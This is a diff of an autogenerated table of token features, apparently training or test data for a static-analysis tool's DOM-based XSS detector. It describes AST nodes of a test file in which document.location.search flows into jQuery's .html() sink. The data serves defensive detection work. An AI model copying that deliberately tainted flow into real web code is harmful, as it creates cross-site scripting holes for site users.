$('myId ... target) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:24 | $('myId ... target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:24 | $('myId ... target) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:24 | exceptional return of $('myId ... target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:24 | exceptional return of $('myId ... target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:24 | exceptional return of $('myId ... target) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:24 | exceptional return of $('myId ... target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:24 | exceptional return of $('myId ... target) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:384:5:384:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:384:5:384:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:384:5:384:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17387,6 +120986,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:384:5:384:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:384:5:384:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:384:5:384:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:384:13:384:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:384:13:384:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:384:13:384:16 | html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:384:13:384:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:384:13:384:16 | html | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:384:18:384:23 | target | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:384:18:384:23 | target | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:384:18:384:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17394,6 +120998,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:384:18:384:23 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:384:18:384:23 | target | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:384:18:384:23 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:3 | $ | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:30 | $('myId ... .taint) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:30 | $('myId ... .taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:30 | $('myId ... .taint) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:30 | $('myId ... .taint) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:30 | $('myId ... .taint) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:30 | exceptional return of $('myId ... .taint) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:30 | exceptional return of $('myId ... .taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:30 | exceptional return of $('myId ... .taint) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:30 | exceptional return of $('myId ... .taint) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:386:3:386:30 | exceptional return of $('myId ... .taint) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:386:5:386:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:386:5:386:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:386:5:386:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17401,6 +121035,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:386:5:386:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:386:5:386:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:386:5:386:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:386:13:386:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:386:13:386:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:386:13:386:16 | html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:386:13:386:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:386:13:386:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:386:18:386:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:386:18:386:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:386:18:386:23 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:386:18:386:23 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:386:18:386:23 | target | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:386:18:386:29 | target.taint | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:386:18:386:29 | target.taint | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:386:18:386:29 | target.taint | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17408,6 +121052,67 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:386:18:386:29 | target.taint | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:386:18:386:29 | target.taint | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:386:18:386:29 | target.taint | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:386:25:386:29 | taint | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:386:25:386:29 | taint | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:386:25:386:29 | taint | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:386:25:386:29 | taint | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:386:25:386:29 | taint | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:8 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:8 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:8 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:8 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:8 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:15 | target.taint2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:15 | target.taint2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:15 | target.taint2 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:15 | target.taint2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:15 | target.taint2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:19 | target.taint2 = 2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:19 | target.taint2 = 2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:19 | target.taint2 = 2 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:19 | target.taint2 = 2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:388:3:388:19 | target.taint2 = 2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:388:10:388:15 | taint2 | contextFunctionInterfaces | 